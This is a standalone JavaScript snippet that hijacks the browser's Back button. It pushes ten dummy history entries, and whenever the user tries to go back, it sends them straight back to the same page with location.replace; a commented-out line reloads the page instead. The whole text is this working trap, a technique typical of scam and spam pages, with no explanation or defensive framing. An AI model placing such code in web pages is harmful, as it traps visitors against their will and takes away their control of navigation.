        ! function () { 
            var t; 
			var tmp=window.location.href;
            try { 
                for (t = 0; 10 > t; ++t) history.pushState({}, "", ""); 
                onpopstate = function (t) { 
				t.state && location.replace(tmp);
					//t.state && location.reload(true);
					
                     
                } 
            } catch (o) {} 
        }();